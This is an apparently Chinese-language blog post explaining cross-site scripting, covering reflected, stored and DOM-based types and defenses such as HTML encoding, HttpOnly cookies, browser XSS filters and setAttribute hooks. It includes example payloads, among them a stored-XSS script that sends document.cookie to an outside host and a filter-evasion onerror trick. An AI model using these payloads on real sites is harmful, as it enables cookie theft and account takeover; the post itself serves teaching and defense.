<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>XSS | swing</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="什么是XSSXSS又称CSS，全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞。 XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。如，盗取用户Cookie、破坏页面结构、重定向到其它">
<meta name="keywords" content="技术">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS">
<meta property="og:url" content="http://swingboy.github.io/2018/11/23/XSS/index.html">
<meta property="og:site_name" content="swing">
<meta property="og:description" content="什么是XSSXSS又称CSS，全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞。 XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。如，盗取用户Cookie、破坏页面结构、重定向到其它">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://swingboy.github.io/2018/11/23/XSS/img/xss危害.png">
<meta property="og:updated_time" content="2020-06-02T06:03:57.187Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS">
<meta name="twitter:description" content="什么是XSSXSS又称CSS，全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞。 XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。如，盗取用户Cookie、破坏页面结构、重定向到其它">
<meta name="twitter:image" content="http://swingboy.github.io/2018/11/23/XSS/img/xss危害.png">
  
    <link rel="alternate" href="/atom.xml" title="swing" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">swing</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://swingboy.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-XSS" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/11/23/XSS/" class="article-date">
  <time datetime="2018-11-23T14:32:05.000Z" itemprop="datePublished">2018-11-23</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      XSS
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h4 id="什么是XSS"><a href="#什么是XSS" class="headerlink" title="什么是XSS"></a>什么是XSS</h4><p>XSS又称CSS，全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞。</p>
<p>XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。如，盗取用户Cookie、破坏页面结构、重定向到其它网站等。</p>
<h4 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h4><p><img src="./img/xss危害.png" alt></p>
<p>这么多~~</p>
<h4 id="有哪些注入的方法和途径："><a href="#有哪些注入的方法和途径：" class="headerlink" title="有哪些注入的方法和途径："></a>有哪些注入的方法和途径：</h4><ul>
<li>在 HTML 中内嵌的文本中，恶意内容以 script 标签形成注入。</li>
<li>在内联的 JavaScript 中，拼接的数据突破了原本的限制（字符串，变量，方法名等）。</li>
<li>在标签属性中，恶意内容包含引号，从而突破属性值的限制，注入其他属性或者标签。</li>
<li>在标签的 href、src 等属性中，包含 javascript: 等可执行代码。</li>
<li>在 onload、onerror、onclick 等事件中，注入不受控制代码。</li>
<li>在 style 属性和标签中，包含类似 background-image:url(“javascript:…”); 的代码（新版本浏览器已经可以防范）。</li>
<li>在 style 属性和标签中，包含类似 expression(…) 的 CSS 表达式代码（新版本浏览器已经可以防范）。</li>
</ul>
<blockquote>
<p>总之，如果开发者没有将用户输入的文本进行合适的过滤，就贸然插入到 HTML 中，这很容易造成注入漏洞。攻击者可以利用漏洞，构造出恶意的代码指令，进而利用恶意代码危害数据安全。</p>
</blockquote>
<h4 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h4><h5 id="1、反射型xss攻击"><a href="#1、反射型xss攻击" class="headerlink" title="1、反射型xss攻击"></a>1、反射型xss攻击</h5><p>又称为非持久性跨站点脚本攻击，它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。</p>
<p>反射型ＸＳＳ也被称为非持久性ＣＳＳ。当用户访问一个带有XSS代码的URL请求时，服务器端接收数据后处理，然后把带有XSS代码的数据发送到浏览器，浏览器解析这段带有XSS代码的数据后，最终造成ＸＳＳ漏洞。这个过程就像一次反射，故称为反射型ＸＳＳ。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">正常发送消息：</span><br><span class="line"></span><br><span class="line">http://www.test.com/message.php?send=Hello,World！</span><br><span class="line"></span><br><span class="line">接收者将会接收信息并显示Hello,Word</span><br><span class="line"></span><br><span class="line">非正常发送消息：</span><br><span class="line"></span><br><span class="line">http://www.test.com/message.php?send=&lt;script&gt;aldert(‘foolish!’)&lt;/script&gt;！</span><br><span class="line"></span><br><span class="line">接收者接收消息显示的时候将会弹出警告窗口</span><br></pre></td></tr></table></figure>
<h5 id="2、存储型xss攻击"><a href="#2、存储型xss攻击" class="headerlink" title="2、存储型xss攻击"></a>2、存储型xss攻击</h5><p>Stored XSS是存储式XSS漏洞，由于其攻击代码已经存储到服务器上或者数据库中，所以受害者是很多人。</p>
<p>a.com可以发文章，我登录后在a.com中发布了一篇文章，文章中包含了恶意代码，<script>window.open(“<a href="http://www.b.com?param=”+document.cookie">www.b.com?param=”+document.cookie</a>)</script>，保存文章。这时Tom和Jack看到了我发布的文章，当在查看我的文章时就都中招了，他们的cookie信息都发送到了我的服务器上，攻击成功！这个过程中，受害者是多个人。</p>
<p>Stored XSS漏洞危害性更大，危害面更广。</p>
<h5 id="3、DOMBasedXSS（基于dom的跨站点脚本攻击）"><a href="#3、DOMBasedXSS（基于dom的跨站点脚本攻击）" class="headerlink" title="3、DOMBasedXSS（基于dom的跨站点脚本攻击）"></a>3、DOMBasedXSS（基于dom的跨站点脚本攻击）</h5><p>基于DOM的XSS有时也称为type0XSS。当用户能够通过交互修改浏览器页面中的DOM(DocumentObjectModel)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来说它也是反射型XSS。</p>
<p>通过修改页面的DOM节点形成的XSS，称之为DOMBasedXSS。</p>
<p>前提是易受攻击的网站有一个HTML页面采用不安全的方式从document.location 或document.URL 或 document.referrer获取数据（或者任何其他攻击者可以修改的对象）。<br>　　<br>var pos= document.URL.indexOf(“name=”)+5;</p>
<p>var len = document.URL.substring(pos,document.URL.length);  </p>
<p>document.write(len);  </p>
<blockquote>
</blockquote>
<p>这个页面，name是截取URL中get过来的name参数<br>正常操作：<br><a href="http://www.vulnerable.site/welcome.html?name=Joe" target="_blank" rel="noopener">http://www.vulnerable.site/welcome.html?name=Joe</a><br>非正常操作：<br><a href="http://www.vulnerable.site/welcome.html?name=" target="_blank" rel="noopener">http://www.vulnerable.site/welcome.html?name=</a><script>a1lert(document.cookie)</script></p>
<h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><h4 id="类似这些操作要小心"><a href="#类似这些操作要小心" class="headerlink" title="类似这些操作要小心"></a>类似这些操作要小心</h4><p>innerHTML、.outerHTML、document.write()</p>
<h4 id="HTML-Encode"><a href="#HTML-Encode" class="headerlink" title="HTML Encode"></a>HTML Encode</h4><p>用户将数据提交上来的时候进行HTML编码，将相应的符号转换为实体名称再进行下一步的处理。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">比如用户输入：&lt;script&gt;window.location.href=”http://www.baidu.com”;&lt;/script&gt;，保存后最终存储的会是：&amp;lt;script&amp;gt;window.location.href=&amp;quot;http://www.baidu.com&amp;quot;&amp;lt;/script&amp;gt;在展现时浏览器会对这些字符转换成文本内容显示，而不是一段可执行的代码。</span><br></pre></td></tr></table></figure>
<h4 id="过滤或移除特殊的Html标签"><a href="#过滤或移除特殊的Html标签" class="headerlink" title="过滤或移除特殊的Html标签"></a>过滤或移除特殊的Html标签</h4><p>例如: &lt;script&gt;, &lt;iframe&lt; , &lt; for &lt;, &gt; for &gt;, &amp;quot for</p>
<h5 id="过滤JavaScript-事件的标签"><a href="#过滤JavaScript-事件的标签" class="headerlink" title="过滤JavaScript 事件的标签"></a>过滤JavaScript 事件的标签</h5><p>例如 “onclick=”, “onfocus” 等等。</p>
<h4 id="将重要的cookie标记为http-only"><a href="#将重要的cookie标记为http-only" class="headerlink" title="将重要的cookie标记为http only"></a>将重要的cookie标记为http only</h4><p>这样的话Javascript 中的document.cookie语句就不能获取到cookie了.</p>
<h4 id="表单数据规定值的类型"><a href="#表单数据规定值的类型" class="headerlink" title="表单数据规定值的类型"></a>表单数据规定值的类型</h4><p>例如：年龄应为只能为int、name只能为字母数字组合</p>
<blockquote>
<p>这里有个国人写的xss过滤的  <a href="https://jsxss.com/zh/index.html" target="_blank" rel="noopener">https://jsxss.com/zh/index.html</a></p>
</blockquote>
<h4 id="Secure标记"><a href="#Secure标记" class="headerlink" title="Secure标记"></a>Secure标记</h4><p>标记为 Secure 的Cookie只应通过被HTTPS协议加密过的请求发送给服务端。</p>
<h4 id="X-XSS-Protection"><a href="#X-XSS-Protection" class="headerlink" title="X-XSS-Protection"></a>X-XSS-Protection</h4><p>让浏览器去做xss筛选，起到保护作用。</p>
<p>只要在HTTP响应报文的头部增加一个X-XSS-Protection 字段，明确地告诉浏览器XSS filter/auditor该如何工作。 </p>
<p>X-XSS-Protection 的字段有三个可选配置值：</p>
<ul>
<li>0： 表示关闭浏览器的XSS防护机制</li>
<li>1：删除检测到的恶意代码，如果响应报文中没有看到X-XSS-Protection 字段，那么浏览器就认为X-XSS-Protection配置为1，这是浏览器的默认设置</li>
<li>1; mode=block：如果检测到恶意代码，在不渲染恶意代码</li>
</ul>
<h3 id="浏览器XSS过滤策略"><a href="#浏览器XSS过滤策略" class="headerlink" title="浏览器XSS过滤策略"></a>浏览器XSS过滤策略</h3><p>从IE8 开始，IE 浏览器内置了一个针对XSS攻击的防护机制，这个浏览器内置的防护机制就是所谓的XSS filter，这个防护机制主要用于减轻反射型XSS 攻击带来的危害。 基于Webkit 内核的浏览器（比如Chrome）随后也增加一个名为XSS auditor 的防护机制，作用和IE中的XSS filter类似。这两种XSS防护机制的目的都很简单，如果浏览器检测到了含有恶意代码的输入被呈现在HTML文档中，那么这段呈现的恶意代码要么被删除，要么被转义，恶意代码不会被正常的渲染出来，当然了，浏览器是否要拦截这段恶意代码取决于浏览器的XSS防护设置。</p>
<p>怎么设置策略。看上面“X-XSS-Protection”</p>
<hr>
<p>IE引入的XSS filter。<br>有一堆的正则表达式。<br>每一行正则式代表一条规则。IE在判断时会扫描URL，对匹配上的正则表达式的url报警，提示发现xss攻击并将字符替换为“#“。</p>
<hr>
<p>chrome XSSAuditor的工作原理<br>chrome的XSSAuditor也被整合到了渲染引擎WebKit中。</p>
<p>当网页加载时，XSSAuditor会在页面之前苹果用户的输入。它首先评估用户输入是否包含有恶意内容，如果有就拦截。XSSAuditor也会检查用户是否会“反射”到正在渲染的页面中。</p>
<hr>
<p><strong><em>原理的区别：</em></strong><br>与IE不同的是，chrome的XSSAuditor并没有使用正则的形式去判断。chrome的xss过滤是在词法解析阶段进行的。在解析网页时，html代码会被分解成不同的token（每个token即一个元素），XSSAuditor会逐一审查token，将token中存在的危险属性、字段和url比较，若url中也有同样的内容，则XSSAuditor会认为这是一个反射型xss攻击，随后会对该字段进行过滤处理。</p>
<p>例如在检查如下代码 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\&lt;iframe src=&quot;x&quot; onerror=&quot;alert(6)&quot;\&gt;\&lt;/iframe\&gt;</span><br></pre></td></tr></table></figure>
<p>会依次做如下判断:  </p>
<ul>
<li>1.检查开始标签iframe，如果包含属性src、onerror,则认为可能危险，继续检查</li>
<li>2.如果src 不是以javascript:开头，则安全，放行。</li>
<li>3.onerror中包含脚本，检查这段代码是否同样出现在url中。</li>
<li>4.如果出现在url中，认为这个地方有问题，这段代码会被过滤成&lt;iframe src=”x” onerror=”void(0)”&gt;&lt;/iframe&gt; 如果没有出现在url中，认为这个地方没有问题，继续。</li>
<li>5.检查终止标签iframe，没有问题，全流程结束</li>
</ul>
<blockquote>
<p>火狐浏览器为什么没有xss filter机制<br>XSS攻击也应正了安全圈内非常有名的一句话：所有的输入都是有害的。</p>
</blockquote>
<h3 id="建立XSS-防火墙"><a href="#建立XSS-防火墙" class="headerlink" title="建立XSS 防火墙"></a>建立XSS 防火墙</h3><h4 id="内联事件拦截"><a href="#内联事件拦截" class="headerlink" title="内联事件拦截"></a>内联事件拦截</h4><p>主动防御</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">\&lt;img src=&quot;&#123;路径&#125;&quot; /\&gt;</span><br><span class="line">\&lt;img src=&quot;&#123;路径&quot; onload=&quot;alert(/xss/)&#125;&quot; /\&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onclick=&quot;console.log(&apos;target&apos;)&quot;&gt;CLICK ME&lt;/button&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">	document.addEventListener(&apos;click&apos;, function(e) &#123;</span><br><span class="line">		console.log(&apos;bubble&apos;);</span><br><span class="line">	&#125;);</span><br><span class="line"></span><br><span class="line">	document.addEventListener(&apos;click&apos;, function(e) &#123;</span><br><span class="line">		console.log(&apos;capture&apos;);</span><br><span class="line">		//e.stopImmediatePropagation();</span><br><span class="line">        // ele.onclick = null</span><br><span class="line">	&#125;, true);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<h4 id="被动扫描"><a href="#被动扫描" class="headerlink" title="被动扫描"></a>被动扫描</h4><p>就是把页面里所有元素都扫描一遍，检测那些 on 开头的内联属性，看看是不是存在异常。</p>
<h5 id="字符策略的缺陷"><a href="#字符策略的缺陷" class="headerlink" title="字符策略的缺陷"></a>字符策略的缺陷</h5><p>光靠代码字符串来判断，还是会有疏漏的。尤其是黑客们知道有这么个玩意存在，会更加小心了。把代码转义用以躲避关键字，并将字符存储在其他地方，以躲过长度检测，即可完全绕过我们的监控了：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\&lt;img src=&quot;*&quot; onerror=&quot;window[&apos;ev&apos;+&apos;al&apos;](this.align)&quot; align=&quot;alert(&apos;a mass of code...&apos;)&quot;/\&gt;</span><br></pre></td></tr></table></figure></p>
<h4 id="可疑模块拦截"><a href="#可疑模块拦截" class="headerlink" title="可疑模块拦截"></a>可疑模块拦截</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">let raw_fn = Element.prototype.setAttribute;</span><br><span class="line"></span><br><span class="line">Element.prototype.setAttribute = function(name, value) &#123;</span><br><span class="line"></span><br><span class="line">	if (this.tagName == &apos;SCRIPT&apos; &amp;&amp; /^src$/i.test(name)) &#123;</span><br><span class="line">		if (/xss/.test(value)) &#123;</span><br><span class="line">			if (confirm(&apos;试图加载可疑模块：\n\n&apos; + value + &apos;\n\n是否拦截？&apos;)) &#123;</span><br><span class="line">				return;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125; else if (xxxx) &#123;</span><br><span class="line">        //</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        //</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">	raw_fn.apply(this, arguments);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">var el = document.createElement(&apos;script&apos;);</span><br><span class="line">el.setAttribute(&apos;SRC&apos;, &apos;http://www.etherdream.com/xss/alert.js&apos;);</span><br><span class="line">document.body.appendChild(el);</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">// 防御</span><br><span class="line">(function() &#123;</span><br><span class="line">	function installHook(window) &#123;</span><br><span class="line">		var raw_fn = window.Element.prototype.setAttribute;</span><br><span class="line"></span><br><span class="line">		// 勾住当前接口</span><br><span class="line">		window.Element.prototype.setAttribute = function(name, value) &#123;</span><br><span class="line">			// 试试</span><br><span class="line">			alert(name);</span><br><span class="line">			// 向上调用</span><br><span class="line">			raw_fn.apply(this, arguments);</span><br><span class="line">		&#125;;</span><br><span class="line">	&#125;</span><br><span class="line">	// 先保护当前页面</span><br><span class="line">	installHook(window);</span><br><span class="line"></span><br><span class="line">	document.addEventListener(&apos;DOMNodeInserted&apos;, function(e) &#123;</span><br><span class="line">		var element = e.target;</span><br><span class="line"></span><br><span class="line">		// 给框架里环境也装个钩子</span><br><span class="line">		if (element.tagName == &apos;IFRAME&apos;) &#123;</span><br><span class="line">			installHook(element.contentWindow);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;, true);</span><br><span class="line">&#125;)();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">// 反射出纯净的接口</span><br><span class="line">var frm = document.createElement(&apos;iframe&apos;);</span><br><span class="line">document.body.appendChild(frm);</span><br><span class="line">var raw_fn = frm.contentWindow.Element.prototype.setAttribute;</span><br><span class="line"></span><br><span class="line">// 创建脚本</span><br><span class="line">var el = document.createElement(&apos;script&apos;);</span><br><span class="line">raw_fn.call(el, &apos;SRC&apos;, &apos;http://www.etherdream.com/xss/alert.js&apos;);</span><br><span class="line">document.body.appendChild(el);</span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://swingboy.github.io/2018/11/23/XSS/" data-id="ckaxiodiz000r9ko7kk14e6lz" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/技术/">技术</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/11/23/CSRF/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          CSRF
        
      </div>
    </a>
  
  
    <a href="/2018/08/31/MV-模式/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">MV* 模式</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/技术/">技术</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/随笔/">随笔</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/技术/" style="font-size: 20px;">技术</a> <a href="/tags/随笔/" style="font-size: 10px;">随笔</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">一月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">十二月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">三月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/11/">十一月 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/08/">八月 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/07/">七月 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/06/">六月 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/04/">四月 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/03/">三月 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">二月 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/12/">十二月 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/10/">十月 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/07/">七月 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/11/">十一月 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/06/">六月 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/05/">五月 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/04/">四月 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/02/">二月 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/10/">十月 2015</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/01/24/简单梳理react优化相关/">简单梳理react优化相关</a>
          </li>
        
          <li>
            <a href="/2019/12/10/关于前端性能优化的一些事/">关于前端性能优化的一些事</a>
          </li>
        
          <li>
            <a href="/2019/03/29/webpack原理/">webpack原理</a>
          </li>
        
          <li>
            <a href="/2019/03/29/webpackPlugin/">webpackPlugin</a>
          </li>
        
          <li>
            <a href="/2019/03/29/webpackLoader/">webpackLoader</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 火柴人<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>